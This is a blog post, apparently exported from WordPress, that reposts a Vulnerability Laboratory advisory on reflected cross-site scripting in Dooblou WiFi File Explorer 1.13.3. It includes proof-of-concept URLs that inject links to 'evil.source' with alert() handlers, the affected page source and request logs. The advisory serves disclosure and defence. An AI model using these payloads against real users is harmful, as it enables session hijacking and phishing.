{"id":45330,"date":"2023-07-19T21:00:29","date_gmt":"2023-07-19T17:00:29","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/173599\/VL-2317.txt"},"modified":"2023-07-23T10:23:35","modified_gmt":"2023-07-23T05:53:35","slug":"dooblou-wifi-file-explorer-1-13-3-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/dooblou-wifi-file-explorer-1-13-3-cross-site-scripting\/","title":{"rendered":"Dooblou WiFi File Explorer 1.13.3 Cross Site Scripting"},"content":{"rendered":"<p>Document Title:<br \/>\n===============<br \/>\nDooblou WiFi File Explorer 1.13.3 &#8211; Multiple Vulnerabilities<\/p>\n<p>References (Source):<br \/>\n====================<br \/>\nhttps:\/\/www.vulnerability-lab.com\/get_content.php?id=2317<\/p>\n<p>Release Date:<br \/>\n=============<br \/>\n2023-07-04<\/p>\n<p>Vulnerability Laboratory ID (VL-ID):<br \/>\n====================================<br \/>\n2317<\/p>\n<p>Common Vulnerability Scoring System:<br \/>\n====================================<br \/>\n5.1<\/p>\n<p>Vulnerability Class:<br \/>\n====================<br \/>\nMultiple<\/p>\n<p>Current Estimated Price:<br \/>\n========================<br \/>\n500\u20ac &#8211; 1.000\u20ac<\/p>\n<p>Product &amp; Service Introduction:<br \/>\n===============================<br \/>\nBrowse, download and stream individual files that are on your Android device, using a web browser via a WiFi connection.<br \/>\nNo more taking your phone apart to get the SD card out or grabbing your cable to access your camera pictures and copy across your favourite MP3s.<\/p>\n<p>(Copy of the Homepage:https:\/\/play.google.com\/store\/apps\/details?id=com.dooblou.WiFiFileExplorer )<\/p>\n<p>Abstract Advisory Information:<br \/>\n==============================<br \/>\nThe vulnerability laboratory core research team discovered multiple web vulnerabilities in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.<\/p>\n<p>Affected Product(s):<br \/>\n====================<br \/>\nProduct Owner: dooblou<br \/>\nProduct: Dooblou WiFi File Explorer v1.13.3 &#8211; (Android) (Framework) (Wifi) (Web-Application)<\/p>\n<p>Vulnerability Disclosure Timeline:<br \/>\n==================================<br \/>\n2022-01-19: Researcher Notification &amp; Coordination (Security Researcher)<br \/>\n2022-01-20: Vendor Notification (Security Department)<br \/>\n2022-**-**: Vendor Response\/Feedback (Security Department)<br \/>\n2022-**-**: Vendor Fix\/Patch (Service Developer Team)<br \/>\n2022-**-**: Security Acknowledgements (Security Department)<br \/>\n2023-07-04: Public Disclosure (Vulnerability Laboratory)<\/p>\n<p>Discovery Status:<br \/>\n=================<br \/>\nPublished<\/p>\n<p>Exploitation Technique:<br \/>\n=======================<br \/>\nRemote<\/p>\n<p>Severity Level:<br \/>\n===============<br \/>\nMedium<\/p>\n<p>Authentication Type:<br \/>\n====================<br \/>\nRestricted Authentication (Guest Privileges)<\/p>\n<p>User Interaction:<br \/>\n=================<br \/>\nLow User Interaction<\/p>\n<p>Disclosure Type:<br \/>\n================<br \/>\nIndependent Security Research<\/p>\n<p>Technical Details &amp; Description:<br \/>\n================================<br \/>\nMultiple input validation web vulnerabilities has been discovered in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.<br \/>\nThe vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser to web-application<br \/>\nrequests from the application-side.<\/p>\n<p>The vulnerabilities are located in the `search`, `order`, `download`, `mode` parameters. The requested content via get method request is insecure validated<br \/>\nand executes malicious script codes. The attack vector is non-persistent and the rquest method to inject is get. Attacker do not need to be authorized to<br \/>\nperform an attack to execute malicious script codes. The links can be included as malformed upload for example to provoke an execute bby a view of the<br \/>\nfront- &amp; backend of the wifi explorer.<\/p>\n<p>Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious<br \/>\nsource and non-persistent manipulation of affected application modules.<\/p>\n<p>Proof of Concept (PoC):<br \/>\n=======================<br \/>\nThe input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.<br \/>\nFor security demonstration or to reproduce the web vulnerabilities follow the provided information and steps below to continue.<\/p>\n<p>PoC: Exploitation<br \/>\nhttp:\/\/localhost:8000\/storage\/emulated\/0\/Download\/&lt;a href=&#8221;https:\/\/evil.source&#8221; onmouseover=alert(document.domain)&gt;&lt;br&gt;PLEASE CLICK PATH TO RETURN INDEX&lt;\/a&gt;<br \/>\nhttp:\/\/localhost:8000\/storage\/emulated\/0\/Download\/?mode=31&#038;search=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert%28document.domain%29%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX%3C%2Fa%3E&#038;x=3&#038;y=3<br \/>\nhttp:\/\/localhost:8000\/storage\/emulated\/0\/Download\/?mode=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX&#038;search=a&#038;x=3&#038;y=3<br \/>\nhttp:\/\/localhost:8000\/storage\/emulated\/?order=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX<\/p>\n<p>Vulnerable Sources: Execution Points<br \/>\n&lt;table width=&#8221;100%&#8221; cellspacing=&#8221;0&#8243; cellpadding=&#8221;16&#8243; border=&#8221;0&#8243;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td<br \/>\nstyle=&#8221;vertical-align:top;&#8221;&gt;&lt;table style=&#8221;background-color: #FFA81E;<br \/>\nbackground-image: url(\/x99_dooblou_res\/x99_dooblou_gradient.png);<br \/>\nbackground-repeat: repeat-x; background-position:top;&#8221; width=&#8221;700&#8243;<br \/>\ncellspacing=&#8221;3&#8243; cellpadding=&#8221;5&#8243; border=&#8221;0&#8243;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;center&gt;&lt;span<br \/>\nclass=&#8221;doob_large_text&#8221;&gt;ERROR&lt;\/span&gt;&lt;\/center&gt;&lt;\/td&gt;&lt;\/tr&gt;&lt;\/tbody&gt;&lt;\/table&gt;&lt;br&gt;&lt;tabl<br \/>\ne style=&#8221;background-color: #B2B2B2; background-image:<br \/>\nurl(\/x99_dooblou_res\/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;&#8221; width=&#8221;700&#8243; cellspacing=&#8221;3&#8243; cellpadding=&#8221;5&#8243; border=&#8221;0&#8243;&gt;<br \/>\n&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;span class=&#8221;doob_medium_text&#8221;&gt;Cannot find file or<br \/>\ndirectory! \/storage\/emulated\/0\/Download\/&lt;a href=&#8221;https:\/\/evil.source&#8221; onmouseover=&#8221;alert(document.domain)&#8221;&gt;&lt;br&gt;PLEASE CLICK USER PATH TO RETURN<br \/>\nINDEX&lt;\/a&gt;&lt;\/span&gt;&lt;\/td&gt;&lt;\/tr&gt;&lt;\/tbody&gt;&lt;\/table&gt;&lt;br&gt;&lt;span class=&#8221;doob_medium_text&#8221;&gt;&lt;span class=&#8221;doob_link&#8221;&gt;&amp;nbsp;&amp;nbsp;&lt;a<br \/>\nhref=&#8221;\/&#8221;&gt;&gt;&gt;&amp;nbsp;Back To<br \/>\nFiles&amp;nbsp;&gt;&gt;&lt;\/a&gt;&lt;\/span&gt;&lt;\/span&gt;&lt;br&gt;&lt;\/td&gt;&lt;\/tr&gt;&lt;\/tbody&gt;&lt;\/table&gt;&lt;br&gt;<br \/>\n&#8211;<br \/>\n&lt;li&gt;&lt;\/li&gt;&lt;\/ul&gt;&lt;\/span&gt;&lt;\/span&gt;&lt;\/td&gt;&lt;\/tr&gt;&lt;\/tbody&gt;&lt;\/table&gt;&lt;\/div&gt;&lt;div class=&#8221;body row scroll-x scroll-y&#8221;&gt;&lt;table width=&#8221;100%&#8221; cellspacing=&#8221;0&#8243; cellpadding=&#8221;6&#8243; border=&#8221;0&#8243;&gt;&lt;tbody&gt;&lt;tr&gt;<br \/>\n&lt;td style=&#8221;vertical-align:top;&#8221; width=&#8221;100%&#8221;&gt;&lt;form name=&#8221;multiSelect&#8221; style=&#8221;margin: 0px; padding: 0px;&#8221; action=&#8221;\/storage\/emulated\/0\/Download\/&#8221; enctype=&#8221;multipart\/form-data&#8221; method=&#8221;POST&#8221;&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;fileNames&#8221; value=&#8221;&#8221;&gt;&lt;table width=&#8221;100%&#8221; cellspacing=&#8221;0&#8243; cellpadding=&#8221;1&#8243; border=&#8221;0&#8243; bgcolor=&#8221;#000000&#8243;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;<br \/>\n&lt;table width=&#8221;100%&#8221; cellspacing=&#8221;2&#8243; cellpadding=&#8221;3&#8243; border=&#8221;0&#8243; bgcolor=&#8221;#FFFFFF&#8221;&gt;&lt;tbody&gt;&lt;tr style=&#8221;background-color: #FFA81E; background-image: url(\/x99_dooblou_res\/x99_dooblou_gradient.png);<br \/>\nbackground-repeat: repeat-x; background-position:top;&#8221; height=&#8221;30&#8243;&gt;&lt;td colspan=&#8221;5&#8243;&gt;&lt;table width=&#8221;100%&#8221; cellspacing=&#8221;0&#8243; cellpadding=&#8221;0&#8243; border=&#8221;0&#8243;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&#8221;white-space:<br \/>\nnowrap;vertical-align:middle&#8221;&gt;&lt;span class=&#8221;doob_small_text_bold&#8221;&gt;&amp;nbsp;&lt;\/span&gt;&lt;\/td&gt;&lt;td style=&#8221;white-space: nowrap;vertical-align:middle&#8221; align=&#8221;right&#8221;&gt;&lt;span class=&#8221;doob_small_text_bold&#8221;&gt;<br \/>\n&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;a href=&#8221;?view=23&amp;mode=&lt;a href=&#8221; https:=&#8221;&#8221; evil.source&#8221;=&#8221;&#8221; onmouseover=&#8221;alert(document.domain)&#8221;&gt;&lt;br&gt;PLEASE CLICK PATH TO RETURN INDEX&amp;search=a&#8221;&gt;<br \/>\n&lt;img style=&#8221;vertical-align:middle;border-style: none&#8221; src=&#8221;\/x99_dooblou_res\/x99_dooblou_details.png&#8221; alt=&#8221;img&#8221; title=&#8221;Details&#8221;&gt;&lt;\/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;|&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;<br \/>\n&lt;a href=&#8221;?view=24&amp;mode=&lt;a href=&#8221; https:=&#8221;&#8221; evil.source&#8221;=&#8221;&#8221; onmouseover=&#8221;alert(document.domain)&#8221;&gt;&lt;br&gt;PLEASE CLICK PATH TO RETURN INDEX&amp;search=a&#8221;&gt;<br \/>\n&lt;img style=&#8221;vertical-align:middle;border-style: none&#8221; src=&#8221;\/x99_dooblou_res\/x99_dooblou_thumbnails.png&#8221; alt=&#8221;img&#8221; title=&#8221;Thumbnails&#8221;&gt;&lt;\/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;|&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;<br \/>\n&lt;a href=&#8221;?view=38&amp;mode=&lt;a href=&#8221; https:=&#8221;&#8221; evil.source&#8221;=&#8221;&#8221; onmouseover=&#8221;alert(document.domain)&#8221;&gt;&lt;br&gt;PLEASE CLICK PATH TO RETURN I<br \/>\n&#8211;<br \/>\n&lt;td style=&#8221;white-space: nowrap;vertical-align:middle&#8221;&gt;&lt;input value=&#8221;&#8221; type=&#8221;checkbox&#8221; name=&#8221;selectAll&#8221; onclick=&#8221;setCheckAll();&#8221;&gt;&amp;nbsp;&amp;nbsp;&lt;a class=&#8221;doob_button&#8221;<br \/>\nhref=&#8221;javascript:setMultiSelect(&#8216;\/storage\/emulated\/&#8217;, &#8216;action&#8217;, &#8217;18&amp;order=&gt;&#8221; &lt;&lt;=&#8221;&#8221;&gt;&gt;&#8221;&lt;a href=&#8221;https:\/\/evil.source&#8221; onmouseover=alert(document.domain)&#8221;&gt;&#8217;);javascript:document.multiSelect.submit();&#8221;<br \/>\nstyle=&#8221;&#8221;&gt;Download&lt;\/a&gt;&amp;nbsp;&lt;a class=&#8221;doob_button&#8221; href=&#8221;javascript:setMultiSelectConfirm(&#8216;Are you sure you want to delete? This cannot be undone!&#8217;, &#8216;\/storage\/emulated\/&#8217;, &#8216;action&#8217;,<br \/>\n&#8217;13&amp;order=&gt;&#8221;&lt;&lt;&gt;&lt;a href=&#8221;https:\/\/evil.source&#8221; onmouseover=alert(document.domain)&gt;&#8217;);javascript:document.multiSelect.submit();&#8221; style=&#8221;&#8221;&gt;Delete&lt;\/a&gt;&amp;nbsp;<br \/>\n&lt;a class=&#8221;doob_button&#8221; href=&#8217;javascript:setMultiSelectPromptQuery(&#8220;Create Copy&#8221;,<br \/>\n&#8220;\/storage\/emulated\/&#8221;, &#8220;\/storage\/emulated\/&#8221;, &#8220;action&#8221;, &#8220;35&amp;order=&gt;&#8221;&lt;&lt;&lt;a href=&#8221;https:\/\/evil.source&#8221; onmouseover=alert(document.domain)&gt;&#8221;, &#8220;name&#8221;);javascript:document.multiSelect.submit();&#8217;<br \/>\nstyle=&#8221;&#8221;&gt;Create Copy&lt;\/a&gt;&amp;nbsp;&lt;a class=&#8221;doob_button&#8221; href=&#8221;x99_dooblou_pro_version.html&#8221; style=&#8221;&#8221;&gt;Zip&lt;\/a&gt;&amp;nbsp;&lt;a class=&#8221;doob_button&#8221; href=&#8221;x99_dooblou_pro_version.html&#8221; style=&#8221;&#8221;&gt;Unzip&lt;\/a&gt;&lt;\/td&gt;<br \/>\n&lt;td align=&#8221;right&#8221; style=&#8221;white-space: nowrap;vertical-align:middle&#8221;&gt;&lt;span class=&#8221;doob_small_text_bold&#8221;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;a href=&#8221;javascript:showTreeview()&#8221;&gt;&lt;img style=&#8221;vertical-align:middle;border-style:<br \/>\nnone&#8221; src=&#8221;\/x99_dooblou_res\/x99_dooblou_tree_dark.png&#8221; alt=&#8221;img&#8221; title=&#8221;Show Treeview&#8221;&gt;&lt;\/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;|&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;<br \/>\n&lt;a href=&#8221;?view=23&amp;order=&gt;&#8221;&lt;&lt;&gt;&lt;a href=&#8221;https:\/\/evil.source&#8221; onmouseover=alert(document.domain)&gt;&#8221;&gt;&lt;img style=&#8221;vertical-align:middle;border-style: none&#8221; src=&#8221;\/x99_dooblou_res\/x99_dooblou_details.png&#8221; alt=&#8221;img&#8221;<br \/>\ntitle=&#8221;Details&#8221;&gt;&lt;\/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;|&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;a href=&#8221;?view=24&amp;order=&gt;&#8221;&lt;&lt;&gt;&lt;a href=&#8221;https:\/\/evil.source&#8221; onmouseover=alert(document.domain)&gt;&#8221;&gt;&lt;img style=&#8221;vertical-align:middle;border-style:<br \/>\nnone&#8221; src=&#8221;\/x99_dooblou_res\/x99_dooblou_thumbnails.png&#8221; alt=&#8221;img&#8221; title=&#8221;Thumbnails&#8221;&gt;&lt;\/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;|&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;<br \/>\n&lt;a href=&#8221;?view=38&amp;order=&gt;&#8221;&lt;&lt;&gt;&lt;a href=&#8221;https:\/\/evil.source&#8221; onmouseover=alert(document.domain)&gt;&#8221;&gt;&lt;img style=&#8221;vertical-align:middle;border-style: none&#8221; src=&#8221;\/x99_dooblou_res\/x99_dooblou_grid.png&#8221; alt=&#8221;img&#8221;<br \/>\ntitle=&#8221;Thumbnails&#8221;&gt;&lt;\/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;\/span&gt;&lt;\/td&gt;&lt;\/tr&gt;&lt;\/table&gt;<\/p>\n<p>&#8212;PoC Session Logs &#8212;<br \/>\nhttp:\/\/localhost:8000\/storage\/emulated\/0\/Download\/&lt;a href=&#8221;https:\/\/evil.source&#8221; onmouseover=alert(document.domain)&gt;&lt;br&gt;PLEASE CLICK USER PATH TO RETURN INDEX&lt;\/x99_dooblou_wifi_signal_strength.xml<br \/>\nHost: localhost:8000<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko\/20100101 Firefox\/102.0<br \/>\nAccept: *\/*<br \/>\nAccept-Language: de,en-US;q=0.7,en;q=0.3<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nConnection: keep-alive<br \/>\nReferer:http:\/\/localhost:8000\/storage\/emulated\/0\/Download\/%3Ca%20href=%22https:\/\/evil.source%22%20onmouseover=alert(document.domain)%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C\/a%3E<br \/>\nGET: HTTP\/1.1 200 OK<br \/>\nCache-Control: no-cache<br \/>\nContent-Type: text\/xml<br \/>\n&#8211;<br \/>\nhttp:\/\/localhost:8000\/storage\/emulated\/0\/Download\/?mode=&lt;a+href%3D&#8221;https%3A%2F%2Fevil.source&#8221;+onmouseover%3Dalert(document.domain)&gt;&lt;br&gt;PLEASE+CLICK+PATH+TO+RETURN+INDEX&amp;search=a&amp;x=3&amp;y=3<br \/>\nHost: localhost:8000<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko\/20100101 Firefox\/102.0<br \/>\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8<br \/>\nAccept-Language: de,en-US;q=0.7,en;q=0.3<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nConnection: keep-alive<br \/>\nCookie: treeview=0<br \/>\nUpgrade-Insecure-Requests: 1<br \/>\nGET: HTTP\/1.1 200 OK<br \/>\nCache-Control: no-store, no-cache, must-revalidate<br \/>\nContent-Type: text\/html<br \/>\n&#8211;<br \/>\nhttp:\/\/localhost:8000\/storage\/emulated\/0\/Download\/&lt;a href=&#8221;https:\/\/evil.source&#8221; onmouseover=alert(document.domain)&gt;&lt;br&gt;PLEASE CLICK USER PATH TO RETURN INDEX&lt;\/x99_dooblou_wifi_signal_strength.xml<br \/>\nHost: localhost:8000<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko\/20100101 Firefox\/102.0<br \/>\nAccept: *\/*<br \/>\nAccept-Language: de,en-US;q=0.7,en;q=0.3<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nConnection: keep-alive<br \/>\nReferer:http:\/\/localhost:8000\/storage\/emulated\/0\/Download\/%&lt;a href=&#8221;https:\/\/evil.source&#8221; onmouseover=alert(document.domain)&gt;%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C\/a%3E<br \/>\nGET: HTTP\/1.1 200 OK<br \/>\nCache-Control: no-cache<br \/>\nContent-Type: text\/xml<\/p>\n<p>Security Risk:<br \/>\n==============<br \/>\nThe security risk of the multiple web vulnerabilities in the ios mobile wifi web-application are estimated as medium.<\/p>\n<p>Credits &amp; Authors:<br \/>\n==================<br \/>\nVulnerability-Lab [Research Team] -https:\/\/www.vulnerability-lab.com\/show.php?user=Vulnerability-Lab<\/p>\n<p>Disclaimer &amp; Information:<br \/>\n=========================<br \/>\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br \/>\neither expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br \/>\nor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br \/>\nor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br \/>\nnot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br \/>\nWe do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<\/p>\n<p>Domains: https:\/\/www.vulnerability-lab.com ; https:\/\/www.vuln-lab.com ;https:\/\/www.vulnerability-db.com<\/p>\n<p>Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.<br \/>\nPermission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br \/>\nmedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br \/>\ninformation on this website is trademark of vulnerability-lab team &amp; the specific authors or managers. To record, list, modify, use or<br \/>\nedit our material contact (admin@ or research@) to get a ask permission.<\/p>\n<p>Copyright \u00a9 2022 | Vulnerability Laboratory &#8211; [Evolution Security GmbH]\u2122<\/p>\n<p>&#8212;<br \/>\nVULNERABILITY LABORATORY (VULNERABILITY LAB)<br \/>\nRESEARCH, BUG BOUNTY &amp; RESPONSIBLE DISCLOSURE<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Document Title: =============== Dooblou WiFi File Explorer 1.13.3 &#8211; Multiple Vulnerabilities References (Source): ==================== https:\/\/www.vulnerability-lab.com\/get_content.php?id=2317 Release Date: ============= 2023-07-04 Vulnerability Laboratory ID (VL-ID): ==================================== 2317 Common Vulnerability Scoring System: ==================================== 5.1 Vulnerability Class: ==================== Multiple Current Estimated Price: ======================== 500\u20ac &#8211; 1.000\u20ac Product &amp; Service Introduction: =============================== Browse, download and stream individual files that are &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-45330","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45330","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=45330"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45330\/revisions"}],"predecessor-version":[{"id":45538,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45330\/revisions\/45538"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=45330"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=45330"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=45330"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}